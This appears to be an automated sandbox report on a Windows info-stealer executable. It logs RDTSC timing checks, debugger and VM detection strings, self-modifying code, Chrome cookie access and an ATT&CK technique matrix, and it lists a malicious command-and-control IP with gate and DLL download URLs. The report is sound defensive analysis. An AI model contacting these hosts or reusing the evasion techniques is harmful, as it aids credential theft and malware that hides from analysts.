              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C190F second address: 7C1915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C1915 second address: 7C1927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jl 00007F56AD341B16h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C1927 second address: 7C1933 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F56ACB76F36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C1933 second address: 7C1947 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56AD341B1Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C1947 second address: 7C194B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C194B second address: 7C194F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C194F second address: 7C1955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D35D2 second address: 7D35DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F56AD341B18h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D35DF second address: 7D35E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D3125 second address: 7D3129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D3129 second address: 7D312D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D32A8 second address: 7D32AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D32AC second address: 7D32B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D32B2 second address: 7D32B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D32B8 second address: 7D32D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F56ACB76F42h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3C8B second address: 7E3C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3C91 second address: 7E3C96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3C96 second address: 7E3CA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F56AD341B16h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2FDA second address: 7E300E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56ACB76F44h 0x00000009 popad 0x0000000a jmp 00007F56ACB76F3Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F56ACB76F3Fh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3431 second address: 7E3451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56AD341B26h 0x00000009 pop ebx 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3451 second address: 7E3459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E35B0 second address: 7E35BE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F56AD341B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3862 second address: 7E3866 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3866 second address: 7E386F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E386F second address: 7E3878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3878 second address: 7E387C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E54F5 second address: 7E5501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F56ACB76F3Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5356 second address: 7E5362 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F56AD341B16h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5362 second address: 7E5394 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F47h 0x00000007 jmp 00007F56ACB76F3Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007F56ACB76F5Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5394 second address: 7E53AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56AD341B1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ECB9E second address: 7ECBA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5170425 second address: 517042B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 517042B second address: 517042F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 517042F second address: 517047C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F56AD341B25h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movsx ebx, ax 0x00000016 pushfd 0x00000017 jmp 00007F56AD341B24h 0x0000001c xor cx, BA08h 0x00000021 jmp 00007F56AD341B1Bh 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5170575 second address: 517058D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F56ACB76F44h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7118C2 second address: 7118C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7118C8 second address: 7118CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7118CC second address: 7118D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 711A88 second address: 711A96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 563BF1 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 709B3A instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 708DF4 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 78CF92 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 1631Jump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 2792Thread sleep count: 56 > 30Jump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 2792Thread sleep time: -112056s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 6604Thread sleep count: 51 > 30Jump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 6604Thread sleep time: -102051s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 1672Thread sleep count: 50 > 30Jump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 1672Thread sleep time: -100050s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 5852Thread sleep count: 1631 > 30Jump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 5852Thread sleep time: -3263631s >= -30000sJump to behavior
              Source: file.exe, file.exe, 00000000.00000002.2800810220.00000000006E5000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: Amcache.hve.6.drBinary or memory string: VMware
              Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
              Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: file.exe, 00000000.00000002.2801350861.000000000119E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware:
              Source: file.exe, 00000000.00000002.2801350861.00000000011E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWHQ!
              Source: file.exe, 00000000.00000002.2801350861.0000000001212000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.6.drBinary or memory string: vmci.sys
              Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
              Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
              Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
              Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.6.drBinary or memory string: VMware20,1
              Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: file.exe, 00000000.00000002.2801350861.000000000119E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: file.exe, 00000000.00000002.2800810220.00000000006E5000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3424, type: MEMORYSTR
              Source: file.exe, file.exe, 00000000.00000002.2800810220.00000000006E5000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: :Program Manager
              Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000000.00000002.2800489909.000000000038A000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2801350861.000000000119E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3424, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3424, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000000.00000002.2800489909.000000000038A000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2801350861.000000000119E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3424, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter
              1
              DLL Side-Loading
              2
              Process Injection
              1
              Masquerading
              1
              OS Credential Dumping
              641
              Security Software Discovery
              Remote Services1
              Data from Local System
              11
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading
              24
              Virtualization/Sandbox Evasion
              LSASS Memory24
              Virtualization/Sandbox Evasion
              Remote Desktop ProtocolData from Removable Media2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Disable or Modify Tools
              Security Account Manager2
              Process Discovery
              SMB/Windows Admin SharesData from Network Shared Drive112
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Process Injection
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Obfuscated Files or Information
              LSA Secrets222
              System Information Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
              Software Packing
              Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              file.exe42%VirustotalBrowse
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://185.215.113.100/e2b1563c6670f193.php100%URL Reputationmalware
              http://185.215.113.100/0d60be0de163924d/sqlite3.dll100%URL Reputationmalware
              http://185.215.113.100100%URL Reputationmalware
              http://upx.sf.net0%URL Reputationsafe
              http://185.215.113.100/100%URL Reputationmalware
              http://www.sqlite.org/copyright.html.0%URL Reputationsafe
              http://185.215.113.100/e2b1563c6670f193.phpUser16%VirustotalBrowse
              http://185.215.113.1000d60be0de163924d/sqlite3.dllY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZG0%Avira URL Cloudsafe
              http://185.215.113.100/e2b1563c6670f193.phpion:6%VirustotalBrowse
              http://185.215.113.100/e2b1563c6670f193.phpWm100%Avira URL Cloudmalware
              http://185.215.113.100/0d60be0de163924d/sqlite3.dllq19%VirustotalBrowse
              http://185.215.113.100/0d60be0de163924d/sqlite3.dllq100%Avira URL Cloudmalware
              http://185.215.113.100/e2b1563c6670f193.phpUser100%Avira URL Cloudmalware
              http://185.215.113.100/e2b1563c6670f193.phpion:100%Avira URL Cloudmalware
              http://185.215.113.100/e2b1563c6670f193.phpZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZ100%Avira URL Cloudmalware
              http://185.215.113.100/e2b1563c6670f193.phpx100%Avira URL Cloudmalware
              http://185.215.113.100/e2b1563c6670f193.phpinit.exe100%Avira URL Cloudmalware
              http://185.215.113.100GIJ0%Avira URL Cloudsafe
              http://185.215.113.100:0%Avira URL Cloudsafe
              http://185.215.113.100/e2b1563c6670f193.php7mH100%Avira URL Cloudmalware
              http://185.215.113.100s.exe0%Avira URL Cloudsafe
              http://185.215.113.100/e2b1563c6670f193.phpZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZ16%VirustotalBrowse
              http://185.215.113.100/0d60be0de163924d/sqlite3.dllc100%Avira URL Cloudmalware
              http://185.215.113.100/e2b1563c6670f193.phpinit.exe18%VirustotalBrowse
              http://185.215.113.100/e2b1563c6670f193.phpx12%VirustotalBrowse
              http://185.215.113.100/0d60be0de163924d/sqlite3.dllc19%VirustotalBrowse
              No contacted domains info
              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.100/e2b1563c6670f193.phptrue
              • URL Reputation: malware
              unknown
              http://185.215.113.100/0d60be0de163924d/sqlite3.dlltrue
              • URL Reputation: malware
              unknown
              http://185.215.113.100/true
              • URL Reputation: malware
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://185.215.113.100/e2b1563c6670f193.phpUserfile.exe, 00000000.00000002.2800489909.00000000004CD000.00000040.00000001.01000000.00000003.sdmptrue
              • 16%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.1000d60be0de163924d/sqlite3.dllY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGfile.exe, 00000000.00000002.2800489909.00000000004CD000.00000040.00000001.01000000.00000003.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://185.215.113.100/e2b1563c6670f193.phpion:file.exe, 00000000.00000002.2800489909.00000000004CD000.00000040.00000001.01000000.00000003.sdmptrue
              • 6%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100file.exe, 00000000.00000002.2800489909.00000000004CD000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2801350861.000000000119E000.00000004.00000020.00020000.00000000.sdmptrue
              • URL Reputation: malware
              unknown
              http://185.215.113.100/0d60be0de163924d/sqlite3.dllqfile.exe, 00000000.00000002.2801350861.00000000011F6000.00000004.00000020.00020000.00000000.sdmptrue
              • 19%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100/e2b1563c6670f193.phpWmfile.exe, 00000000.00000002.2801350861.00000000011F6000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100/e2b1563c6670f193.phpZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZfile.exe, 00000000.00000002.2800489909.00000000004CD000.00000040.00000001.01000000.00000003.sdmptrue
              • 16%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100/e2b1563c6670f193.phpxfile.exe, 00000000.00000002.2801350861.00000000011F6000.00000004.00000020.00020000.00000000.sdmptrue
              • 12%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              http://upx.sf.netAmcache.hve.6.drfalse
              • URL Reputation: safe
              unknown
              http://185.215.113.100/e2b1563c6670f193.phpinit.exefile.exe, 00000000.00000002.2800489909.000000000035C000.00000040.00000001.01000000.00000003.sdmptrue
              • 18%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100GIJfile.exe, 00000000.00000002.2800489909.00000000004CD000.00000040.00000001.01000000.00000003.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://185.215.113.100:file.exe, 00000000.00000002.2801350861.000000000119E000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://185.215.113.100s.exefile.exe, 00000000.00000002.2800489909.0000000000321000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2800489909.000000000035C000.00000040.00000001.01000000.00000003.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://185.215.113.100/e2b1563c6670f193.php7mHfile.exe, 00000000.00000002.2801350861.00000000011F6000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://www.sqlite.org/copyright.html.file.exe, 00000000.00000002.2821491143.0000000061ED3000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2818939342.000000001D853000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://185.215.113.100/0d60be0de163924d/sqlite3.dllcfile.exe, 00000000.00000002.2801350861.00000000011F6000.00000004.00000020.00020000.00000000.sdmptrue
              • 19%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              185.215.113.100
              unknownPortugal
